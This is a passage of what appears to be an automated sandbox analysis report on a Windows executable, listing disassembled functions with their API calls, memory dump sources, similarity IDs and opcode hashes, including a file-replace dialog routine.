                                                                                                                        • Opcode Fuzzy Hash: ae73b2e30f5ccfa11693e6ed44abe8a809e7e2e578f93fb59f0307e3db2ad5cd
                                                                                                                        • Instruction Fuzzy Hash: 43B092A2258100BC2148A1141A02D360288C1CAB10330F12EF918F9280D84068090532
                                                                                                                        Function 00EAE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE3FC
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: 4b4c50759ce842a3387f83774fe41dc9fedc223970ceafb2d3e1c108041304ba
                                                                                                                        • Instruction ID: e19d8a765b4fa6bde4c9808251475ae82e913e9856734b57218c778b8191c2e9
                                                                                                                        • Opcode Fuzzy Hash: 4b4c50759ce842a3387f83774fe41dc9fedc223970ceafb2d3e1c108041304ba
                                                                                                                        • Instruction Fuzzy Hash: 50B092A1258100BC2108A1145A02D360288C1CAF10330F02FF818F9280D8446E050532
                                                                                                                        Function 00EAE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE3FC
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: c642491f215c329a649efac70b263e986d6a6886fb6816a6077caeb2579a258e
                                                                                                                        • Instruction ID: 56aeaa6e5efcb261372ea6e64ad9f751b8e2709d6688ab39f965a21292f1e1e4
                                                                                                                        • Opcode Fuzzy Hash: c642491f215c329a649efac70b263e986d6a6886fb6816a6077caeb2579a258e
                                                                                                                        • Instruction Fuzzy Hash: 80B092A1258100BC214861141A02D760288C1CAB10330F12EF618F92809841280A0532
                                                                                                                        Function 00EAE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE3FC
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: 0d8a4e86e3e5865d3356afc9cafc18c4adbc5a3e342d52e64bb7794197037056
                                                                                                                        • Instruction ID: 4a00b821fcd76de59d0e45bcbbd35eda11fcb56dc2fc865dc31d12efb10a99c9
                                                                                                                        • Opcode Fuzzy Hash: 0d8a4e86e3e5865d3356afc9cafc18c4adbc5a3e342d52e64bb7794197037056
                                                                                                                        • Instruction Fuzzy Hash: 05A011E22A8202BC300C22002E02C3B028CC0CAF28330B02EF828BC280AC80280A0832
                                                                                                                        Function 00EAE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE3FC
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: ddd8d80caa78340d58e20c03747c666edc47eaf3c50ff4c92ed95d070c82f950
                                                                                                                        • Instruction ID: 4cb648500f58dc6e99fe6e523067575396d982fd9883501c8758a3735690038f
                                                                                                                        • Opcode Fuzzy Hash: ddd8d80caa78340d58e20c03747c666edc47eaf3c50ff4c92ed95d070c82f950
                                                                                                                        • Instruction Fuzzy Hash: BAA011E22A8202BC300C22002E02C3B028CC0CAF20330B82EF82ABC280A880280A0832
                                                                                                                        Function 00EAE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE3FC
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: ad897729853633d140512bde49d5c52e4b0d0b2abcbd3e3ba9c65caee6c11991
                                                                                                                        • Instruction ID: 4cb648500f58dc6e99fe6e523067575396d982fd9883501c8758a3735690038f
                                                                                                                        • Opcode Fuzzy Hash: ad897729853633d140512bde49d5c52e4b0d0b2abcbd3e3ba9c65caee6c11991
                                                                                                                        • Instruction Fuzzy Hash: BAA011E22A8202BC300C22002E02C3B028CC0CAF20330B82EF82ABC280A880280A0832
                                                                                                                        Function 00EAE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE3FC
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: 2a1dad7546c5ceb352968cda88540d09a9ee6b5ab7c27cebc7849df2895e5101
                                                                                                                        • Instruction ID: 4cb648500f58dc6e99fe6e523067575396d982fd9883501c8758a3735690038f
                                                                                                                        • Opcode Fuzzy Hash: 2a1dad7546c5ceb352968cda88540d09a9ee6b5ab7c27cebc7849df2895e5101
                                                                                                                        • Instruction Fuzzy Hash: BAA011E22A8202BC300C22002E02C3B028CC0CAF20330B82EF82ABC280A880280A0832
                                                                                                                        Function 00EAE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE3FC
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: ed2860d0e4d47e3c3ff30b4d16b29d1bb83f6807210ad2eded5ce4305eb037a9
                                                                                                                        • Instruction ID: 4cb648500f58dc6e99fe6e523067575396d982fd9883501c8758a3735690038f
                                                                                                                        • Opcode Fuzzy Hash: ed2860d0e4d47e3c3ff30b4d16b29d1bb83f6807210ad2eded5ce4305eb037a9
                                                                                                                        • Instruction Fuzzy Hash: BAA011E22A8202BC300C22002E02C3B028CC0CAF20330B82EF82ABC280A880280A0832
                                                                                                                        Function 00EAE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE3FC
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: fc9273bfcb7ad09876a7aa5450739207067bf3fe714abf1e203e8f895e85e755
                                                                                                                        • Instruction ID: 4cb648500f58dc6e99fe6e523067575396d982fd9883501c8758a3735690038f
                                                                                                                        • Opcode Fuzzy Hash: fc9273bfcb7ad09876a7aa5450739207067bf3fe714abf1e203e8f895e85e755
                                                                                                                        • Instruction Fuzzy Hash: BAA011E22A8202BC300C22002E02C3B028CC0CAF20330B82EF82ABC280A880280A0832
                                                                                                                        Function 00E99F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetEndOfFile.KERNELBASE(?,00E9903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00E99F0C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 749574446-0
                                                                                                                        • Opcode ID: be7e78964a077f7ffb4762c731756b674d24f8f21ce967c6fc4c1cdfcd9c7e59
                                                                                                                        • Instruction ID: 7427609da5ea13b3caa6e38f406815bbdb8bcbfeb33409776f12e313520c1882
                                                                                                                        • Opcode Fuzzy Hash: be7e78964a077f7ffb4762c731756b674d24f8f21ce967c6fc4c1cdfcd9c7e59
                                                                                                                        • Instruction Fuzzy Hash: 1AA0113008000A8A8E002B32CA0A88C3B20EB20BC030082A8A00BCA0A2CB23880B8A00
                                                                                                                        Function 00EAAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,00EAAE72,C:\Users\user\Desktop,00000000,00ED946A,00000006), ref: 00EAAC08
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1611563598-0
                                                                                                                        • Opcode ID: bd65bdaba52d66774a51dc5ddb1fe45ce2b7e5d51bb8b7d55e8ffa3b8a74d43b
                                                                                                                        • Instruction ID: 3b140748757fca23bcb99aed17ce870bb686ec257ddeff0be06209e6d6531e3d
                                                                                                                        • Opcode Fuzzy Hash: bd65bdaba52d66774a51dc5ddb1fe45ce2b7e5d51bb8b7d55e8ffa3b8a74d43b
                                                                                                                        • Instruction Fuzzy Hash: DAA011302022008F82002B328F0AA0EBAAAAFA2B00F08C038A00080230CB32C820AA00
                                                                                                                        Function 00E99620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNELBASE(000000FF,?,?,00E995D6,?,?,?,?,?,00EC2641,000000FF), ref: 00E9963B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2962429428-0
                                                                                                                        • Opcode ID: 95eb8d28e751b6d46afd61b58834e595b4bd9b1811aeec446eed14eb8082fcb0
                                                                                                                        • Instruction ID: 14313d93561d358ba6ac1679071913d8b4162c56c767f354b76e14c3fa32abfe
                                                                                                                        • Opcode Fuzzy Hash: 95eb8d28e751b6d46afd61b58834e595b4bd9b1811aeec446eed14eb8082fcb0
                                                                                                                        • Instruction Fuzzy Hash: 2EF08971581B159FDF308A38C459B9277E8AB12325F046B1ED0E662AE2D761658D8A40

                                                                                                                        Non-executed Functions

                                                                                                                        Function 00EAC220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E91316: GetDlgItem.USER32(00000000,00003021), ref: 00E9135A
                                                                                                                          • Part of subcall function 00E91316: SetWindowTextW.USER32(00000000,00EC35F4), ref: 00E91370
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00EAC2B1
                                                                                                                        • EndDialog.USER32(?,00000006), ref: 00EAC2C4
                                                                                                                        • GetDlgItem.USER32(?,0000006C), ref: 00EAC2E0
                                                                                                                        • SetFocus.USER32(00000000), ref: 00EAC2E7
                                                                                                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 00EAC321
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00EAC358
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00EAC36E
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EAC38C
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EAC39C
                                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00EAC3B8
                                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00EAC3D4
                                                                                                                        • _swprintf.LIBCMT ref: 00EAC404
                                                                                                                          • Part of subcall function 00E94092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E940A5
                                                                                                                        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00EAC417
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00EAC41E
                                                                                                                        • _swprintf.LIBCMT ref: 00EAC477
                                                                                                                        • SetDlgItemTextW.USER32(?,00000068,?), ref: 00EAC48A
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00EAC4A7
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00EAC4C7
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EAC4D7
                                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00EAC4F1
                                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00EAC509
                                                                                                                        • _swprintf.LIBCMT ref: 00EAC535
                                                                                                                        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00EAC548
                                                                                                                        • _swprintf.LIBCMT ref: 00EAC59C
                                                                                                                        • SetDlgItemTextW.USER32(?,00000069,?), ref: 00EAC5AF
                                                                                                                          • Part of subcall function 00EAAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00EAAF35
                                                                                                                          • Part of subcall function 00EAAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00ECE72C,?,?), ref: 00EAAF84
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                        • String ID: %s %s$%s %s %s$P$REPLACEFILEDLG
                                                                                                                        • API String ID: 797121971-530609767
                                                                                                                        • Opcode ID: dd56e1d7f3d77ccb2014aff1582ee2d920c5a312eae92e39df850866ac5ed19b
                                                                                                                        • Instruction ID: b8f61896765cf6a110695c8f69cbcfa80e1dc499eb1ce0ffe82d5bc63b9be44d
                                                                                                                        • Opcode Fuzzy Hash: dd56e1d7f3d77ccb2014aff1582ee2d920c5a312eae92e39df850866ac5ed19b
                                                                                                                        • Instruction Fuzzy Hash: E5919172248348BFD621DBB1CC49FFB77ECEB8A704F045819B649E6091D771AA098772
                                                                                                                        Function 00E96FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E96FAA
                                                                                                                        • _wcslen.LIBCMT ref: 00E97013
                                                                                                                        • _wcslen.LIBCMT ref: 00E97084
                                                                                                                          • Part of subcall function 00E97A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E97AAB
                                                                                                                          • Part of subcall function 00E97A9C: GetLastError.KERNEL32 ref: 00E97AF1
                                                                                                                          • Part of subcall function 00E97A9C: CloseHandle.KERNEL32(?), ref: 00E97B00
                                                                                                                          • Part of subcall function 00E9A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00E9977F,?,?,00E995CF,?,?,?,?,?,00EC2641,000000FF), ref: 00E9A1F1
